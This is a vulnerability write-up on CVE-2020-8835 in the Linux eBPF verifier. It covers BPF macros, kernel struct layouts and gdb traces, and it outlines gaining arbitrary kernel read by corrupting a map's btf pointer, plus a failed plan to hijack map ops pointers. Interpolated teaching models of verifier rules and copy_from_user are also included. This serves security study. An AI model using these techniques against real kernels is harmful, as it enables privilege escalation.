
CVE-2020-8835 analysis

0x00 Preface

Reproducing this CVE took me a very long time. Mainly I was busy preparing for interviews and could not give it my full attention, and on top of that my first PoC was simply written wrong.... which wasted a lot of time.

0x01 The BPF module

Simply put, the bpf (Berkeley Packet Filter) module is used for packet filtering. User space can inject code into the kernel through the bpf syscall (the kernel build option is off by default and has to be enabled yourself), subject of course to strict checks. The submitted C source is compiled into a BPF target program by an LLVM or Clang compiler. After user space submits the code, the kernel does not execute it immediately; it first simulates its execution. Reference material follows.

0x02 Using bpf

Reference:

It is really no different from x86 assembly; the main things to keep in mind when operating on a map are the following:

  • r1-r5 are the arguments
  • r0 is the return value
  • the return value must be zeroed at the end
  • when r2 is an argument it must point into the stack
  • the pointer returned in r0 is not the value of map[0]

Example operation:

BPF_ALU64_IMM(BPF_MOV, BPF_REG_6, 0),            /* r6 = 0: the key */
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),  /* *(u64 *)(r10 - 8) = r6: key lives on the stack */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),            /* r2 = r10 (frame pointer) */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),           /* r2 = &key; BPF_ADD64_IMM is not a kernel macro, BPF_ALU64_IMM(BPF_ADD, ...) is */
BPF_LD_MAP_FD(BPF_REG_1, cmd_fd),                /* r1 = map: a two-slot LD_IMM64 with BPF_PSEUDO_MAP_FD */
BPF_MAP_LOOKUP(),                                /* the post's own helper (not a kernel macro): call bpf_map_lookup_elem(r1, r2) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),           /* r0 == NULL: fall through to the exit below */
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),    /* r6 = *(u64 *)r0: first 8 bytes of the value */
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),            /* r0 = 0 before exit */
BPF_EXIT_INSN()                                  /* the exit the snippet needs to be accepted */

r0 is a pointer to map[0] (which is not necessarily 0...), so after the call the pointer is certainly not 0 when the lookup succeeds, which means you can use JNE to check whether it succeeded.

Now let me focus on two instructions:

  • BPF_LDX_MEM

BPF_LDX_MEM is really just a memory load; see its definition:

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)                \
    ((struct bpf_insn) {                                \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                                 \
        .src_reg = SRC,                                 \
        .off   = OFF,                                   \
        .imm   = 0 })

This operation is mainly used to read from a map into a register.

  • BPF_STX_MEM
/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)                \
    ((struct bpf_insn) {                                \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                                 \
        .src_reg = SRC,                                 \
        .off   = OFF,                                   \
        .imm   = 0 })

This operation is mainly used to store a register's value into the map; it can also store a register's value onto the stack. So the question arises: what is the update_element callback for, then.... (the ops are generally the operations specific to a given map type.... so they are still used)

  • BPF_LD_IMM64
#define BPF_LD_IMM64(DST, IMM)                          \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                 \
    ((struct bpf_insn) {                                \
        .code  = BPF_LD | BPF_DW | BPF_IMM,             \
        .dst_reg = DST,                                 \
        .src_reg = SRC,                                 \
        .off   = 0,                                     \
        .imm   = (__u32) (IMM) }),                      \
    ((struct bpf_insn) {                                \
        .code  = 0, /* zero is reserved opcode */       \
        .dst_reg = 0,                                   \
        .src_reg = 0,                                   \
        .off   = 0,                                     \
        .imm   = ((__u64) (IMM)) >> 32 })

This macro moves a 64-bit immediate into a 64-bit register in one go.
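The following is an added example, mine rather than code from the original post or from the kernel. It encodes the sample program from the "Using bpf" section with copies of the instruction macros just shown and then runs a small path-sensitive checker that models the rules listed there: r1-r5 are arguments, r2 of a map lookup must point into the stack, the lookup's r0 is a value-or-NULL pointer until it has been tested, and r0 must be a scalar at exit. It goes beyond the post's single program by also checking three deliberately broken variants. The struct layout and opcode values are those of include/uapi/linux/bpf.h; the checker itself is a teaching model and not the in-kernel verifier, the map fd 3 is a constructed placeholder, and the names verify, walk, ld_imm64_value, PROLOGUE and the prog_* arrays are my own.

```c
/* Added example, not from the original post or the kernel: the post's sample
 * program encoded with copies of the kernel instruction macros, plus a small
 * path-sensitive checker modelling the rules the post lists.  Layout and
 * opcodes copy include/uapi/linux/bpf.h; the macros are written as brace
 * initialisers so the programs can be file-scope constants; map fd 3 is a
 * constructed placeholder and the checker is a teaching model, not the verifier. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct bpf_insn { uint8_t code; uint8_t dst_reg:4, src_reg:4; int16_t off; int32_t imm; };
enum { BPF_LD = 0x00, BPF_LDX = 0x01, BPF_STX = 0x03, BPF_JMP = 0x05, BPF_ALU64 = 0x07,
       BPF_K = 0x00, BPF_X = 0x08, BPF_DW = 0x18, BPF_IMM = 0x00, BPF_MEM = 0x60,
       BPF_ADD = 0x00, BPF_MOV = 0xb0, BPF_JNE = 0x50, BPF_CALL = 0x80, BPF_EXIT = 0x90,
       BPF_PSEUDO_MAP_FD = 1, BPF_FUNC_map_lookup_elem = 1 };
enum { BPF_REG_0, BPF_REG_1, BPF_REG_2, BPF_REG_5 = 5, BPF_REG_6, BPF_REG_10 = 10, NREGS };
#define BPF_CLASS(c) ((c) & 0x07)
#define BPF_ALU64_IMM(OP, DST, IMM) { .code = BPF_ALU64 | (OP) | BPF_K, .dst_reg = DST, .imm = IMM }
#define BPF_MOV64_REG(DST, SRC) { .code = BPF_ALU64 | BPF_MOV | BPF_X, .dst_reg = DST, .src_reg = SRC }
#define BPF_LDX_MEM(SZ, DST, SRC, OFF) { .code = BPF_LDX | (SZ) | BPF_MEM, .dst_reg = DST, .src_reg = SRC, .off = OFF }
#define BPF_STX_MEM(SZ, DST, SRC, OFF) { .code = BPF_STX | (SZ) | BPF_MEM, .dst_reg = DST, .src_reg = SRC, .off = OFF }
#define BPF_JMP_IMM(OP, DST, IMM, OFF) { .code = BPF_JMP | (OP) | BPF_K, .dst_reg = DST, .off = OFF, .imm = IMM }
#define BPF_EMIT_CALL(FUNC) { .code = BPF_JMP | BPF_CALL, .imm = FUNC }
#define BPF_EXIT_INSN() { .code = BPF_JMP | BPF_EXIT }
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) /* two 8-byte slots, second has the reserved opcode 0 */ \
    { .code = BPF_LD | BPF_DW | BPF_IMM, .dst_reg = DST, .src_reg = SRC, .imm = (int32_t)(uint32_t)(IMM) }, \
    { .code = 0, .imm = (int32_t)(uint32_t)((uint64_t)(IMM) >> 32) }
#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)
#define BPF_LD_MAP_FD(DST, FD) BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, FD)

/* Reassemble the 64-bit immediate from an LD_IMM64 pair. */
uint64_t ld_imm64_value(const struct bpf_insn pair[2])
{
    return (uint32_t)pair[0].imm | ((uint64_t)(uint32_t)pair[1].imm << 32);
}

enum rs { UNINIT, SCALAR, ZERO, MAP_PTR, STACK_PTR, MAP_VAL_OR_NULL, MAP_VAL };
enum verdict { V_OK, V_UNINIT_REG, V_BAD_MEM, V_NULL_DEREF, V_BAD_ARG, V_BAD_RET, V_NO_EXIT };

/* Abstract-execute from pc with register states r; both edges of a jump are followed. */
static int walk(const struct bpf_insn *p, int n, int pc, enum rs r[NREGS], int budget)
{
    for (; pc < n && budget > 0; pc++, budget--) {
        const struct bpf_insn *i = &p[pc];
        enum rs taken[NREGS]; int base, v;
        if (i->dst_reg >= NREGS || i->src_reg >= NREGS) return V_BAD_MEM;
        switch (i->code) {
        case BPF_ALU64 | BPF_MOV | BPF_K: r[i->dst_reg] = i->imm ? SCALAR : ZERO; break;
        case BPF_ALU64 | BPF_MOV | BPF_X: r[i->dst_reg] = r[i->src_reg]; break;
        case BPF_ALU64 | BPF_ADD | BPF_K: /* pointer + constant keeps its type */
            if (r[i->dst_reg] == ZERO) r[i->dst_reg] = SCALAR; break;
        case BPF_LD | BPF_DW | BPF_IMM: /* pseudo map fd -> map pointer; skip the second slot */
            r[i->dst_reg] = i->src_reg == BPF_PSEUDO_MAP_FD ? MAP_PTR : SCALAR; pc++; break;
        case BPF_LDX | BPF_DW | BPF_MEM: case BPF_STX | BPF_DW | BPF_MEM:
            base = BPF_CLASS(i->code) == BPF_LDX ? i->src_reg : i->dst_reg;
            if (r[base] == MAP_VAL_OR_NULL) return V_NULL_DEREF; /* lookup result not tested */
            if (r[base] != MAP_VAL && r[base] != STACK_PTR) return V_BAD_MEM;
            if (BPF_CLASS(i->code) == BPF_LDX) r[i->dst_reg] = SCALAR;
            else if (r[i->src_reg] == UNINIT) return V_UNINIT_REG;
            break;
        case BPF_JMP | BPF_CALL: /* only map_lookup_elem(map, &key) is modelled */
            if (i->imm != BPF_FUNC_map_lookup_elem) return V_BAD_ARG;
            if (r[BPF_REG_1] != MAP_PTR || r[BPF_REG_2] != STACK_PTR) return V_BAD_ARG;
            r[BPF_REG_0] = MAP_VAL_OR_NULL;
            for (base = BPF_REG_1; base <= BPF_REG_5; base++) r[base] = UNINIT; /* clobbered */
            break;
        case BPF_JMP | BPF_JNE | BPF_K: /* follow the taken edge with its own state copy */
            memcpy(taken, r, sizeof taken);
            if (i->imm == 0 && r[i->dst_reg] == MAP_VAL_OR_NULL) {
                taken[i->dst_reg] = MAP_VAL; /* r != 0: the pointer is usable */
                r[i->dst_reg] = ZERO;        /* r == 0: fall-through sees a known 0 */
            }
            if ((v = walk(p, n, pc + 1 + i->off, taken, budget - 1)) != V_OK) return v;
            break;
        case BPF_JMP | BPF_EXIT:
            return (r[BPF_REG_0] == ZERO || r[BPF_REG_0] == SCALAR) ? V_OK : V_BAD_RET;
        default: return V_BAD_MEM; /* opcode outside this model */
        }
    }
    return V_NO_EXIT;
}

int verify(const struct bpf_insn *p, int n)
{
    enum rs r[NREGS] = { UNINIT };
    r[BPF_REG_1] = SCALAR; r[BPF_REG_10] = STACK_PTR; /* ctx and frame pointer start live */
    return walk(p, n, 0, r, 64);
}

/* Shared prologue: key 0 on the stack, r2 = &key, r1 = map, call the lookup. */
#define PROLOGUE BPF_ALU64_IMM(BPF_MOV, BPF_REG_6, 0), BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
    BPF_LD_MAP_FD(BPF_REG_1, 3), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem)
#define NINSN(a) ((int)(sizeof(a) / sizeof((a)[0])))
const struct bpf_insn prog_ok[] = { PROLOGUE, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), /* the post's program */
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0), BPF_EXIT_INSN() };
const struct bpf_insn prog_no_null_check[] = { PROLOGUE, /* lookup result dereferenced without the NULL test */
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0), BPF_EXIT_INSN() };
const struct bpf_insn prog_ret_pointer[] = { PROLOGUE, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(),
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), BPF_EXIT_INSN() }; /* r0 still a pointer at exit */
const struct bpf_insn prog_key_not_on_stack[] = { BPF_ALU64_IMM(BPF_MOV, BPF_REG_2, 0), BPF_LD_MAP_FD(BPF_REG_1, 3),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0), BPF_EXIT_INSN() }; /* r2 is not &stack */
const struct bpf_insn big_imm[] = { BPF_LD_IMM64(BPF_REG_1, 0xdeadbeefcafebabeULL) };

int main(void)
{
    printf("ok=%d no_null=%d ret_ptr=%d key=%d imm=%llx\n", verify(prog_ok, NINSN(prog_ok)),
           verify(prog_no_null_check, NINSN(prog_no_null_check)), verify(prog_ret_pointer, NINSN(prog_ret_pointer)),
           verify(prog_key_not_on_stack, NINSN(prog_key_not_on_stack)), (unsigned long long)ld_imm64_value(big_imm));
}
```

Only the first program is accepted: the other three fail at exactly the rule they break (a load through an untested lookup result, a pointer left in r0 at exit, a key argument that is not a stack address). The LD_IMM64 pair shows why the map-fd load occupies two instruction slots and why a checker has to skip the second one.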

0x03 Vulnerability analysis

The core issue is that during the simulated execution a wrong range check leads to arbitrary read/write. Analysis reference:

0x04 From out-of-bounds read/write to arbitrary read/write

ZDI has already described the method for this part.

0x00 Arbitrary address read

When operating on an array map, the main structure involved is

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[0] __aligned(8);
        void *ptrs[0] __aligned(8);
        void __percpu *pptrs[0] __aligned(8);
    };
};

The map structure inside it:

struct bpf_map {
    /* The first two cachelines with read-mostly members of which some
     * are also accessed in fast-path (e.g. ops, max_entries).
     */
    const struct bpf_map_ops *ops ____cacheline_aligned;
    struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
    void *security;
#endif
    enum bpf_map_type map_type;
    u32 key_size;
    u32 value_size;
    u32 max_entries;
    u32 map_flags;
    int spin_lock_off; /* >=0 valid offset, <0 error */
    u32 id;
    int numa_node;
    u32 btf_key_type_id;
    u32 btf_value_type_id;
    struct btf *btf;
    struct bpf_map_memory memory;
    char name[BPF_OBJ_NAME_LEN];
    u32 btf_vmlinux_value_type_id;
    bool unpriv_array;
    bool frozen; /* write-once; write-protected by freeze_mutex */
    /* 22 bytes hole */

    /* The 3rd and 4th cacheline with misc members to avoid false sharing
     * particularly with refcounting.
     */
    atomic64_t refcnt ____cacheline_aligned;
    atomic64_t usercnt;
    struct work_struct work;
    struct mutex freeze_mutex;
    u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

It contains a btf struct pointer that is used in the function bpf_map_get_info_by_fd (the BPF_OBJ_GET_INFO_BY_FD command of the bpf syscall calls it). Since you have an out-of-bounds read/write, you can naturally change the map's btf pointer to an arbitrary address, and then read four bytes from an arbitrary address.

0x01 Other (failed) ideas for arbitrary read/write

The problem is that doing it that way is too complicated. I wanted something simpler: arbitrary read/write directly through a syscall. Here are my (failed) ideas.

0x00 copy_from_user

I thought of copy_from_user and copy_to_user: if some of the ops callbacks could be changed to copy_from_user and copy_to_user, wouldn't that be arbitrary read/write? Then I found that the first argument has to be a map.... otherwise the check fails....

0x00 Idealised analysis

At first I did not consider the argument problem, so I analysed copy_from_user in detail. Below is my analysis of copy_from_user; first, the source of copy_from_user:

static __always_inline unsigned long __must_check
copy_from_user(void *to, const void __user *from, unsigned long n)
{
    if (likely(check_copy_size(to, n, false)))
        n = _copy_from_user(to, from, n);
    return n;
}

From an exploitation point of view, check_copy_size should be bypassed if it can be (meaning: if you can call _copy_from_user, do not call copy_from_user). We can see that the actual copy is done by _copy_from_user, so let's follow that function:

static inline __must_check unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
{
    unsigned long res = n;
    might_fault();
    if (likely(access_ok(from, n))) {
        kasan_check_write(to, n);
        res = raw_copy_from_user(to, from, n);
    }
    if (unlikely(res))
        memset(to + (n - res), 0, res);
    return res;
}

That is still just some checks, so the real work is done by raw_copy_from_user(); let's look at raw_copy_from_user():

static inline __must_check unsigned long
raw_copy_from_user(void *to, const void __user * from, unsigned long n)
{
    if (__builtin_constant_p(n)) {
        switch(n) {
        case 1:
            *(u8 *)to = *(u8 __force *)from;
            return 0;
        case 2:
            *(u16 *)to = *(u16 __force *)from;
            return 0;
        case 4:
            *(u32 *)to = *(u32 __force *)from;
            return 0;
#ifdef CONFIG_64BIT
        case 8:
            *(u64 *)to = *(u64 __force *)from;
            return 0;
#endif
        }
    }

    memcpy(to, (const void __force *)from, n);
    return 0;
}

Looking at this function, we see that this is where the real operation happens, and there are no checks at all; it is exactly the function we are looking for. However, if you try to find the address of this function, you cannot find it in either System.map or vmlinux; you can only find _copy_from_user. Because my vmlinux is too large, I could only read the assembly in gdb. Although you can use

disassemble /m

to see the correspondence between assembly and source, it is generally not very accurate, so you still have to read the assembly. If you read it, you will see that it calls a function copy_user_generic_unrolled, so let's look at the assembly of copy_user_generic_unrolled:

0xffffffff83ab1fc0 <+0>: nop
0xffffffff83ab1fc1 <+1>: nop
0xffffffff83ab1fc2 <+2>: nop
0xffffffff83ab1fc3 <+3>: cmp edx,0x8
0xffffffff83ab1fc6 <+6>: jb 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
0xffffffff83ab1fcc <+12>: mov ecx,edi
0xffffffff83ab1fce <+14>: and ecx,0x7
0xffffffff83ab1fd1 <+17>: je 0xffffffff83ab1fe8 <copy_user_generic_unrolled+40>
0xffffffff83ab1fd3 <+19>: sub ecx,0x8
0xffffffff83ab1fd6 <+22>: neg ecx
0xffffffff83ab1fd8 <+24>: sub edx,ecx
0xffffffff83ab1fda <+26>: mov al,BYTE PTR [rsi]
0xffffffff83ab1fdc <+28>: mov BYTE PTR [rdi],al
0xffffffff83ab1fde <+30>: inc rsi
0xffffffff83ab1fe1 <+33>: inc rdi
0xffffffff83ab1fe4 <+36>: dec ecx
0xffffffff83ab1fe6 <+38>: jne 0xffffffff83ab1fda <copy_user_generic_unrolled+26>
0xffffffff83ab1fe8 <+40>: mov ecx,edx
0xffffffff83ab1fea <+42>: and edx,0x3f
0xffffffff83ab1fed <+45>: shr ecx,0x6
0xffffffff83ab1ff0 <+48>: je 0xffffffff83ab203c <copy_user_generic_unrolled+124>
0xffffffff83ab1ff2 <+50>: mov r8,QWORD PTR [rsi]
0xffffffff83ab1ff5 <+53>: mov r9,QWORD PTR [rsi+0x8]
0xffffffff83ab1ff9 <+57>: mov r10,QWORD PTR [rsi+0x10]
0xffffffff83ab1ffd <+61>: mov r11,QWORD PTR [rsi+0x18]
0xffffffff83ab2001 <+65>: mov QWORD PTR [rdi],r8
0xffffffff83ab2004 <+68>: mov QWORD PTR [rdi+0x8],r9
0xffffffff83ab2008 <+72>: mov QWORD PTR [rdi+0x10],r10
0xffffffff83ab200c <+76>: mov QWORD PTR [rdi+0x18],r11
0xffffffff83ab2010 <+80>: mov r8,QWORD PTR [rsi+0x20]
0xffffffff83ab2014 <+84>: mov r9,QWORD PTR [rsi+0x28]
0xffffffff83ab2018 <+88>: mov r10,QWORD PTR [rsi+0x30]
0xffffffff83ab201c <+92>: mov r11,QWORD PTR [rsi+0x38]
0xffffffff83ab2020 <+96>: mov QWORD PTR [rdi+0x20],r8
0xffffffff83ab2024 <+100>: mov QWORD PTR [rdi+0x28],r9
0xffffffff83ab2028 <+104>: mov QWORD PTR [rdi+0x30],r10
0xffffffff83ab202c <+108>: mov QWORD PTR [rdi+0x38],r11
0xffffffff83ab2030 <+112>: lea rsi,[rsi+0x40]
0xffffffff83ab2034 <+116>: lea rdi,[rdi+0x40]
0xffffffff83ab2038 <+120>: dec ecx
0xffffffff83ab203a <+122>: jne 0xffffffff83ab1ff2 <copy_user_generic_unrolled+50>
0xffffffff83ab203c <+124>: mov ecx,edx
0xffffffff83ab203e <+126>: and edx,0x7
0xffffffff83ab2041 <+129>: shr ecx,0x3
0xffffffff83ab2044 <+132>: je 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
0xffffffff83ab2046 <+134>: mov r8,QWORD PTR [rsi]
0xffffffff83ab2049 <+137>: mov QWORD PTR [rdi],r8
0xffffffff83ab204c <+140>: lea rsi,[rsi+0x8]
0xffffffff83ab2050 <+144>: lea rdi,[rdi+0x8]
0xffffffff83ab2054 <+148>: dec ecx
0xffffffff83ab2056 <+150>: jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <+152>: and edx,edx
0xffffffff83ab205a <+154>: je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <+156>: mov ecx,edx
0xffffffff83ab205e <+158>: mov al,BYTE PTR [rsi]
0xffffffff83ab2060 <+160>: mov BYTE PTR [rdi],al
0xffffffff83ab2062 <+162>: inc rsi
0xffffffff83ab2065 <+165>: inc rdi
0xffffffff83ab2068 <+168>: dec ecx
0xffffffff83ab206a <+170>: jne 0xffffffff83ab205e <copy_user_generic_unrolled+158>
0xffffffff83ab206c <+172>: xor eax,eax
0xffffffff83ab206e <+174>: nop
0xffffffff83ab206f <+175>: nop
0xffffffff83ab2070 <+176>: nop
0xffffffff83ab2071 <+177>: ret

Comparing the assembly with the source of raw_copy_from_user, it matches very well; this should be the function. So we only need to change one of the ops pointers to this function, on the condition that you can control the values of the first three arguments....
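The three functions quoted above form one contract: access_ok() bounds the user range, the raw copy may stop early at a faulting byte, and _copy_from_user() zero-fills whatever was not copied so that a short copy never leaves stale kernel bytes in the destination. The following added example (mine, not code from the original post or the kernel) models that contract in user space so the zero-fill behaviour can be observed on constructed input. The "user" address space, its limit, the fault position and all the model_* and run_scenario names are constructed for illustration.

```c
/* Added example, not from the original post or the kernel: a user-space model
 * of copy_from_user -> _copy_from_user -> raw_copy_from_user.  "User" memory is
 * a constructed address space with an access limit standing in for access_ok(),
 * the raw copy can fault part way through like the real one, and the uncopied
 * tail is zero-filled exactly as _copy_from_user() does. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USER_LIMIT 40u   /* constructed: user addresses 0..39 are valid */

/* Constructed "user" contents: the byte at address a is 0x40 + a. */
static unsigned char user_byte(size_t a) { return (unsigned char)(0x40 + a); }

/* access_ok() model: the whole [from, from + n) range must lie below the limit. */
int model_access_ok(size_t from, size_t n)
{
    return from <= USER_LIMIT && n <= USER_LIMIT - from; /* written to avoid overflow */
}

/* raw_copy_from_user() model: copies until the first faulting byte and returns
 * how many bytes were NOT copied (the real exception-table fixup reports the same). */
size_t model_raw_copy(unsigned char *to, size_t from, size_t n, size_t fault_at)
{
    for (size_t k = 0; k < n; k++) {
        if (from + k >= fault_at) return n - k;
        to[k] = user_byte(from + k);
    }
    return 0;
}

/* _copy_from_user() model: range check, raw copy, zero-fill the uncopied tail. */
size_t model_copy_from_user(unsigned char *to, size_t from, size_t n, size_t fault_at)
{
    size_t res = n;
    if (model_access_ok(from, n))
        res = model_raw_copy(to, from, n, fault_at);
    if (res)
        memset(to + (n - res), 0, res); /* never leave stale kernel bytes behind */
    return res;
}

/* copy_from_user() model: check_copy_size() is a compile-time size sanity check in
 * the kernel; here it is modelled as "n must fit the destination", and on failure
 * nothing is copied and n is returned unchanged, as in the quoted source. */
size_t model_copy_from_user_checked(unsigned char *to, size_t to_size,
                                    size_t from, size_t n, size_t fault_at)
{
    if (n > to_size) return n;
    return model_copy_from_user(to, from, n, fault_at);
}

/* Count bytes in buf[lo, hi) equal to v; used to inspect results. */
size_t count_eq(const unsigned char *buf, size_t lo, size_t hi, unsigned char v)
{
    size_t c = 0;
    for (size_t k = lo; k < hi; k++) c += buf[k] == v;
    return c;
}

unsigned char kbuf[16]; /* the kernel-side destination */

/* Pre-fill the kernel-side buffer with a stale 0xCC pattern, then run one copy. */
size_t run_scenario(size_t from, size_t n, size_t fault_at)
{
    if (n > sizeof kbuf) return n;
    memset(kbuf, 0xCC, sizeof kbuf);
    return model_copy_from_user(kbuf, from, n, fault_at);
}

int main(void)
{
    /* 16 bytes from user address 0 with a fault at address 10: 6 bytes uncopied and zeroed */
    printf("uncopied=%zu zeroed=%zu\n", run_scenario(0, 16, 10), count_eq(kbuf, 10, 16, 0));
    return 0;
}
```

A copy that fails access_ok() returns n and leaves the destination entirely zeroed; a copy that faults part way returns the uncopied count and zeroes only the tail. In both cases the 0xCC "stale" pattern is gone, which is the property that matters for information-leak prevention.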

0x01 Problems encountered

I don't know whether you noticed, but this code contains no operation that turns SMAP off. Then, while debugging dynamically, I ran into a problem: even with SMAP enabled, copy_from_user could access user-space memory without turning SMAP off. I was baffled:

[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$rip : 0xffffffff83ab2046 → 0x8d4807894c068b4c → 0x8d4807894c068b4c
$r8 : 0x0000000000000001 → 0x0000000000000001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab203e <copy_user_generic_unrolled+126> and edx, 0x7
0xffffffff83ab2041 <copy_user_generic_unrolled+129> shr ecx, 0x3
0xffffffff83ab2044 <copy_user_generic_unrolled+132> je 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
→ 0xffffffff83ab2046 <copy_user_generic_unrolled+134> mov r8, QWORD PTR [rsi]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+90 ────
85 .L_copy_short_string:
86 movl %edx,%ecx
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
→ 90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2046 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2046 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
